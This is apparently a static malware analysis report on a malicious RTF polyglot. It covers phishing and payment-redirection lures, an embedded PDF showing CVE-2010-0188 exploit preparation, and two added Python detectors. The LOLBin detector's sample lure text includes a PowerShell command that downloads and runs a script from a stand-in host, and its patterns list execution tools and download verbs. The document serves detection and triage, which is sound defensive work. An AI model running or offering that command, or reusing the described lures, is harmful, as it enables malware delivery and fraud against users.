Malicious RTF — malware analysis report

Static analysis result for SHA-256 e6f8c685fa9c1664…

MALICIOUS

RTF

Size: 2.62 MB
First seen: 2024-08-17
MD5: 805761ef7834bfa6015198edc4888485
SHA-1: 60095fff61b426309ed4da1fefd85222bfafeaec
SHA-256: e6f8c685fa9c16647d1787bdc499727575dc1ec788a9f1ed96927797f0642f07
Risk score: 416

Malware Insights

MITRE ATT&CK
  • T1204.001 User Execution: Malicious Link
  • T1566.002 Phishing: Spearphishing Link
  • T1059.001 Command and Scripting Interpreter: PowerShell

The sample exhibits multiple high-risk lures, including a browser extension installation lure and a payment redirection lure, suggesting a phishing or business email compromise campaign. A secondary PDF body embedded in the RTF container carries suspicious static findings, including the CCITTFaxDecode plus XFA/TIFF preparation pattern associated with CVE-2010-0188, which points towards exploit-based delivery. Heuristic hits for a CreateProcess API reference and a LOLBin command sequence in the extracted text further support a payload delivery mechanism. All findings are static: no signature engine (ClamAV) matched the container or the carved PDFs, and the CVE association is a pattern match on the delivery structure, not a confirmed malformed TIFF primitive.

Heuristics 15

  • CCITTFaxDecode + TIFF/XFA exploit prep — LibTIFF CVE-family indicator high CVE related PDF_CCITT_CVE_2010_0188_RELATED
    PDF uses /CCITTFaxDecode together with TIFF/XFA exploit-preparation markers such as rawValue image-field assignment, TIFF data, or heap-spray JavaScript. This matches the delivery pattern for Adobe Reader LibTIFF/CCITTFax parser exploit families, including CVE-2010-0188, but does not prove the exact malformed TIFF primitive.
  • Recovery secret / private key request critical SE_SECRET_RECOVERY_LURE
    Document requests recovery phrases, private keys, backup codes, or saved passwords. Requests for these secrets in a document are high-risk.
  • Secondary embedded PDF body has suspicious static findings critical POLYGLOT_CHILD_PDF_STATIC_TRIAGE
    A valid PDF body was found at a nonzero offset inside another container and its carved contents matched PDF exploit or lure heuristics. This catches polyglots where the top-level magic routes to ZIP/OLE while a PDF reader or downstream parser opens the hidden PDF payload.
  • Reference to CreateProcess API high SC_STR_CREATEPROCESS
    The string 'CreateProcess' appears in the sample. On its own this is only a string indicator (it is also present in legitimate binaries and libraries bundled into documents); it gains weight here because it co-occurs with the command-execution lure text and the embedded PDF exploit-preparation findings.
  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • Payment redirection / bank-detail change lure high SE_PAYMENT_REDIRECT_LURE
    Document describes new or changed bank, wire, ACH, IBAN, SWIFT, or routing instructions — a high-value business-email-compromise pattern
  • Browser extension / update installation lure high SE_BROWSER_INSTALL_LURE
    Document tells the user to install a browser extension, plugin, viewer, or browser update to view content — a common social-engineering path for credential theft and malware installation
  • ASCIIHexDecode filter (with exploit indicators) medium PDF_FILTER_HEX
    Hex-encoding filter present alongside exploit delivery indicators — often used to hide payload or shellcode bytes
  • Urgency / deadline lure low SE_URGENCY_LURE
    Document contains urgency or deadline language ('account will be terminated', 'action required within 24 hours', etc.) — useful context, but low-signal without other findings
  • Visual download / call-to-action button lure low SE_DOWNLOAD_BUTTON
    Document contains a call-to-action phrase ('Click here to download', 'Download Now', etc.) — low-signal unless other findings point to a malicious workflow
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic
  • ASCII85Decode filter (with exploit indicators) low PDF_FILTER_85
    ASCII85 encoding filter present alongside exploit delivery indicators — uncommon outside of obfuscation
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL channel label (macro, JS, link annotation, document body, ...) says which parser reached it. Most entries below contain Objective-C/printf format specifiers (%@, %s) and run straight into adjacent string-table text ("...Failed", "...Handling", "...Could"), which marks them as string-pool fragments from embedded binary or library data (Microsoft identity-library enrollment endpoints, Apple device-service endpoints, Adobe and XMP namespace URIs) rather than links a user would follow. Do not treat them as contacted infrastructure without corroboration from the lure body or dynamic analysis.
    • http://smb://loginShelldefault
    • https://%@/%@?%@Failed
    • https://%@/.well-known/webfinger?resource=%@Microsoft
    • https://enterpriseregistration.%@/enrollmentserver/contract?api-version=1.0https://enterpriseregistration.windows.net/%@/enrollmentserver/contract?api-version=1.0unrecognized
    • https://%@/%@access_tokenxms_ccvaluesFailed
    • https://enterpriseregistration.%@/enrollmentserver/contracthttps://enterpriseregistration.windows.net/%@/enrollmentserver/contractcom.microsoft.msidcache-%@browserwpjWPJ
    • https://%@/.well-known/webfinger(Legacy
    • https://%@/%@/%@/%@It
    • https://fakeurl.contoso.comHandling
    • https://%@foci-%@service=%@
    • https://ccext.adobecces.comhttps://ccext.stage.adobecces.comLinkX-Request-IdX-Request-IDX-Amz-Cf-IdX-Amz-Cf-IDX-Cache?/##rel=
    • https://http://failed
    • http://www.appinf.com/features/no-whitespace-in-element-contentpDocumentType-
    • http://www.appinf.com/features/enable-partial-readsCannot
    • https://appleid.apple.comCould
    • https://%s/.well-known/pvd%sapplication/pvd+jsonexpiresen_US_POSIXyyyy-MM-dd
    • https://%s%sresolverusing
    • http://ParseHttpUrl
    • http://www.dns-sd.org/ServiceTypes.html
    • https://%@DVTAssertionHandlerAssertion
    • https://app.getpocket.com/https://getpocket.com/lohttps://getpocket.com/signup?src=extension&route=/extension_login_successThe
    • https://getpocket.com/v3/send/https://getpocket.com/v3/suggested_tags/https://getpocket.com/v3/get/Decode
    • https://getpocket.com/v3/oauth/authorize.phphttps://getpocket.com/v3/guid/cxt_suggested_availablecxt_suggested_cntRequest
    • http://ns.adobe.com/pdfx/1.3/pdfxidAuthorSubjectCreationDate--TextModDate--Texthttp://purl.org/dc/elements/1.1/creatorBaseURLCreatorTooldescriptionx-defaulttitleCreateDatepdf:CreationDateModifyDatepdf:ModDatepdfxpdfepdfaidMetadataDateXMLuuid:Formatapplication/pdfInstanceIDNull
    • http://ns.adobe.com/xap/1.0/Keywordshttp://ns.adobe.com/pdf/1.3/http://www.aiim.org/pdfa/ns/id/conformancepartamdPDMetadataFTPDFCreationPrivateadbe_style_%.4xrgb(adbe_text_%.4xReasonNACreatorSubDetailDoNotProcessPass_DV_Qualifierforce_qualifyCollectAnalyticsDocumentSizeLanguageR2LNonTier1Or2Contentwith
    • http://ns.adobe.com/pdf/navigator/navigators/EmailArchive/2007NavigatorsunknownobliqueblackheavydemiboldsemiboldCollectionvalueADBE_CompoundTypePaginationBackgroundHeaderFooterIdentityVirtualWatermarkFGPDBatesPermsUR3ReferenceTransformMethodTransformParamsXFAByteRangeViewerPreferencesRightsDocMDPSigFlagsMarkInfoMarkedGRAYRGB
    • http://www.npes.org/pdfx/ns/id/PDF/X-5pgPDF/X-5nISO_PDFEVersionhttp://www.aiim.org/pdfe/ns/id/PDF/E-1http://www.npes.org/pdfvt/ns/id/GTS_PDFVTVersionPDF/VT-1PDF/VT-2PDF/VT-2shttp://www.aiim.org/pdfua/ns/id/pdfuaid:partPDF/UA-1DocumentFormExAnnotsExSignatureEFFullSaveFillInImportExportSubmitStandaloneSpawnTemplateOnlineBarcodePlaintextCreateModifyCopyUPNewWindowIsMapFitHFitVFitBHFitBVFitBXYZFitRFitFoBlAllUnknown
    • http://ns.adobe.com/textLayout/2008
    • http://iso.org/pdf/ssnhttp://iso.org/pdf2/ssnhttp://adobe.com/FTPDFPDSReadOBJR=
    • http://ns.adobe.com/xap/1.0/mm/DocumentIDVersionIDRenditionClassIndexedEIImage
    • http://www.w3.org/1999/xhtmlbhttp://www.w3.org/1999/xhtmlihttp://www.w3.org/1999/xhtmlspanhttp://www.w3.org/1999/xhtmlphttp://www.w3.org/1999/xhtmlbodyhttp://www.w3.org/1999/xhtmlbrhttp://www.xfa.org/schema/xfa-data/1.0/APIVersiontext-alignleftrightcenterjustifytext-decorationdoublewordline-throughcolorvertical-alignline-heightfont-sizefont-weightfont-stylefont-familyfont-variantsmall-capsfont-stretchfont100200300400500600700800900ultra-condensedextra-condensedcondensedsemi-condensedsemi-expandedexpandedextra-expandedultra-expandedptxfa-spacerunyesltrrtlAcroform:Acrobat:double
    • http://www.xfa.org/schema/xfa-data/1.0/
    • http://www.w3.org/1999/xhtml
    • http://www.w3.org/2000/svg
    • http://www.w3.org/1999/xlink
    • http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd
    • http://ns.adobe.com/ucf/1.0/
    • http://ns.adobe.com/pdf/navigator/2007idversionapiVersionsrcloadAsdefaultmodulemimetypenamesIDcategoryiconinitialViewsplitDirectionsplitPositionlocalesinitialFieldsasfhorizontalverticalhttp://ns.adobe.com/pdf/navigator/locales/2007localestrings/strings.asfxhttp://ns.adobe.com/asfstrvalen_USfieldvisibleeditabledisplayName%d
    • http://www.w3.org/1999/xhtmlhttp-equivContent-Typecontenttext/html
    • https://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMMLBOGUSimages/image/x-pngAlternative
    • https://login.windows.net/example.com.UTCyyyy-MM-dd
    • http://schemas.microsoft.com/rel/trusted-realmtenant_discovery_endpointDRS
    • http://www.w3.org/XML/1998/namespacehttp://www.w3.org/xmlns/2000/xmlns_contexts.size(
    • http://xml.org/sax/features/validationhttp://xml.org/sax/features/namespaceshttp://xml.org/sax/features/namespace-prefixeshttp://xml.org/sax/features/external-general-entitieshttp://xml.org/sax/features/external-parameter-entitieshttp://xml.org/sax/features/string-interninghttp://xml.org/sax/properties/declaration-handlerhttp://xml.org/sax/properties/lexical-handlerout
    • http://www.w3.org/XML/1998/namespacehttp://www.w3.org/2000/xmlns/RandomInputStreamEXPAT_ENTROPY_DEBUGEntropy
    • https://configuration.apple.com/configurations/internetservices/cloudkitvoicebanking-1.0.plistServerConfigChecker
    • https://hbrt.adobe.com/xe-receiver/config//xe-receiver/events/PII
    • https://hbrcv.adobe.com/headlightshttps://hl2rcv.adobe.com/headlightssettingsmaxdiskspace10retryintervalmaxretries3urlhibernateidletimeloggingidlepollingintervalidlethresholdidleactivebiasdisableIdlehttp://localhost/headlightshttp://[^/]+
    • https://init.itunes.apple.com/bag.xml?ix=5https://albert.apple.com/deviceservices/deviceActivationhttp://raptor-dr.apple.com:8080/raptor/processorhttps://albert.apple.com/deviceservices/drmHandshakehttps://tbsc.apple.com/ingest/registerhttps://tbsc.apple.com/oob/vendhttps://albert.apple.com/deviceservices/ucertVendhttps://tbsc.apple.com/ucrt/vend2https://albert.apple.com/deviceservices/basebandhttps://albert.apple.com/deviceservices/certifySBhttps://static.ips.apple.com/absinthe-cert/certificate.cerhttps://albert.apple.com/deviceservices/sessionhttps://humb.apple.com/humbug/baacreateXMLRequestFailed
    • https://developer.apple.com/registerADCAudienceCheckErrorDomainDVTFuture
    +8 more URL(s)
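The SE_LOLBIN_RUN_COMMAND heuristic above is described only in prose: a script/execution tool name within 220 characters of a dangerous flag, command verb or URL. The following is an added Python example of that proximity check, written for this page and not taken from the analysis tool. The token lists and the 220-character window are assumptions based on the description, and both input texts are constructed, not extracted from the sample.

```python
import re

# Constructed lure text (not extracted from the sample); it imitates a visible
# "run this" instruction of the kind SE_LOLBIN_RUN_COMMAND is meant to catch.
LURE_TEXT = (
    "Your invoice is protected. To view it, open Windows PowerShell and paste:\n"
    "powershell -nop -w hidden -ep bypass -c \"iwr https://cdn.example.invalid/inv.ps1 | iex\"\n"
    "The archive password is Invoice2024."
)

# Constructed benign text: a tool name with no execution context nearby.
BENIGN_TEXT = "Our helpdesk retired the old rundll32-based installer; contact support if you need help."

# Hypothetical token lists; the report's own lists are not published, so these are assumptions.
LOLBIN_RE = re.compile(
    r"\b(powershell|pwsh|mshta|cmd|rundll32|regsvr32|wscript|cscript|certutil|bitsadmin|msiexec)\b",
    re.I,
)
TRIGGER_RE = re.compile(
    r"(?:-(?:nop|noprofile|ep|executionpolicy|enc|encodedcommand|w|windowstyle|c|command)\b"
    r"|\b(?:iex|iwr|invoke-expression|invoke-webrequest|downloadstring|bypass|hidden)\b"
    r"|https?://\S+)",
    re.I,
)
WINDOW = 220  # characters, matching the threshold quoted in the heuristic description


def find_lolbin_sequences(text, window=WINDOW):
    """Return one (tool, nearest_trigger, distance) tuple per tool mention that has a
    dangerous flag, verb or URL within `window` characters of it."""
    triggers = [(m.start(), m.group(0)) for m in TRIGGER_RE.finditer(text)]
    hits = []
    for m in LOLBIN_RE.finditer(text):
        near = [(abs(pos - m.start()), tok) for pos, tok in triggers if abs(pos - m.start()) <= window]
        if near:
            dist, tok = min(near)
            hits.append((m.group(1).lower(), tok, dist))
    return hits


def has_lolbin_run_command(text):
    """Boolean form of the heuristic: fires if any tool/trigger pair is within the window."""
    return bool(find_lolbin_sequences(text))


if __name__ == "__main__":
    for tool, tok, dist in find_lolbin_sequences(LURE_TEXT):
        print(f"{tool:<12} near {tok!r} ({dist} chars)")
    print("benign text fires:", has_lolbin_run_command(BENIGN_TEXT))
```

The benign line shows why the window matters: the tool name alone ("rundll32-based installer") does not fire, because no flag, verb or URL sits near it. Against macro-laden Office files the same check runs over the macro string pool, where the adjacency is an artifact of extraction rather than a visible instruction, so the label on the hit should record which text channel produced it.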

Extracted artifacts 3

Files carved from inside the sample during analysis. All three carves end at the same byte offset (0x38C8E + 2515747 = 0x418FA + 2479799 = 0x41AB7 + 2479354 = 2748337, the end of the 2.62 MB sample): they are overlapping carves started at three %PDF- markers inside one embedded PDF region, not three independent payloads, which also explains the near-identical base64-blob counts. Treat them as one artifact when deduplicating and use the largest carve (offset 0x38C8E) for follow-up analysis.

Filename / SHA-256 / Kind / Source / Size / Detection

polyglot_child_pdf_off00038c8e.pdf
  SHA-256: fd3c9ab6fb73171c8f72331d9db9cf7ac8c701d7ff0e3f24c3a56c6856db9643
  Kind: polyglot-child-pdf
  Source: secondary PDF body inside RTF container at offset 0x38C8E
  Size: 2515747 bytes
  Detection: ClamAV: No threats found
  Obfuscation or payload: likely (carved artifact contains 181 long base64-like blob(s))

polyglot_child_pdf_off000418fa.pdf
  SHA-256: 317f809737bb6f62b998caefb2168551400b923c02ad153273d69553dadad64f
  Kind: polyglot-child-pdf
  Source: secondary PDF body inside RTF container at offset 0x418FA
  Size: 2479799 bytes
  Detection: ClamAV: No threats found
  Obfuscation or payload: likely (carved artifact contains 175 long base64-like blob(s))

polyglot_child_pdf_off00041ab7.pdf
  SHA-256: fed09557eee2f55b362cf05da0b181396dda57da7d58d1598847230d56f35468
  Kind: polyglot-child-pdf
  Source: secondary PDF body inside RTF container at offset 0x41AB7
  Size: 2479354 bytes
  Detection: ClamAV: No threats found
  Obfuscation or payload: likely (carved artifact contains 175 long base64-like blob(s))
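The polyglot-child-PDF carving described under POLYGLOT_CHILD_PDF_STATIC_TRIAGE, the static PDF markers (XFA, CCITTFaxDecode, ASCIIHexDecode, ASCII85Decode, rawValue) and the overlapping-carve check on the three artifacts above can all be reproduced with a few lines of Python. The block below is an added example written for this page; it is not the analysis tool's code. The RTF+PDF sample bytes are constructed, the marker table is an assumption based on the heuristic names in this report, and only the REPORT_CARVES offsets and sizes come from the page.

```python
import re

PDF_MAGIC = b"%PDF-"
PDF_EOF = b"%%EOF"

# Constructed RTF + PDF polyglot (not the analysed sample): a small RTF body is
# followed by a raw PDF whose embedded-file stream itself contains a "%PDF-"
# marker, so a naive carver sees two PDF headers that share one tail.
# Object /Length values are illustrative and not accurate.
RTF_BODY = (b"{\\rtf1\\ansi\\deff0{\\fonttbl{\\f0 Calibri;}}\\f0\\fs22 "
            b"Updated wire instructions are in the attached viewer.\\par}\n")
INNER_PDF = (
    b"%PDF-1.7\n"
    b"1 0 obj << /Type /Catalog /AcroForm << /XFA 3 0 R >> >> endobj\n"
    b"2 0 obj << /Type /XObject /Subtype /Image /Filter [/ASCIIHexDecode /CCITTFaxDecode] /Length 8 >>\n"
    b"stream\n00000000\nendstream\nendobj\n"
    b"3 0 obj << /Length 72 >>\nstream\n"
    b"<xdp><field name='img'><value><image/></value></field>rawValue</xdp>\n"
    b"endstream\nendobj\n"
    b"4 0 obj << /Type /EmbeddedFile /Length 20 >>\nstream\n%PDF-1.4 nested body\nendstream\nendobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)
SAMPLE = RTF_BODY + INNER_PDF


def carve_child_pdfs(blob):
    """Carve every %PDF- header at a nonzero offset through the last %%EOF (or to end of data)."""
    last_eof = blob.rfind(PDF_EOF)
    carves = []
    for m in re.finditer(re.escape(PDF_MAGIC), blob):
        off = m.start()
        if off == 0:
            continue  # a PDF at offset 0 is a top-level PDF, not a polyglot child
        end = last_eof + len(PDF_EOF) if last_eof > off else len(blob)
        carves.append({"offset": off, "size": end - off, "end": end, "data": blob[off:end]})
    return carves


def carve_ends(entries):
    """Set of end offsets for (offset, size) pairs; a single shared value means
    the carves are nested views of one embedded region, not separate payloads."""
    return {off + size for off, size in entries}


# Offsets and sizes exactly as listed in the Extracted artifacts section of this report.
REPORT_CARVES = [(0x38C8E, 2515747), (0x418FA, 2479799), (0x41AB7, 2479354)]

# Assumed marker table mirroring the heuristic names used in the report.
MARKERS = {
    "PDF_XFA": rb"/XFA\b",
    "PDF_CCITT": rb"/CCITTFaxDecode",
    "PDF_FILTER_HEX": rb"/ASCIIHexDecode",
    "PDF_FILTER_85": rb"/ASCII85Decode",
    "PDF_JS": rb"/JavaScript\b|/JS\b",
    "XFA_RAWVALUE": rb"rawValue",
}


def triage(data):
    """Names of static markers present in a carved PDF body (sorted for stable output)."""
    return sorted(name for name, pat in MARKERS.items() if re.search(pat, data))


if __name__ == "__main__":
    for c in carve_child_pdfs(SAMPLE):
        print(f"child PDF at 0x{c['offset']:X}, {c['size']} bytes, ends at {c['end']}: {triage(c['data'])}")
    print("report carves end at:", carve_ends(REPORT_CARVES))
```

Running this prints two child carves for the constructed sample that both end at the same byte, and a single end offset (2748337) for the three carves in this report, which is the arithmetic behind treating them as one artifact. The marker check is deliberately crude: it fires on a `/CCITTFaxDecode` or `rawValue` string anywhere in the body, so, like the report's own heuristic, it indicates exploit-preparation structure and not a proven malformed TIFF.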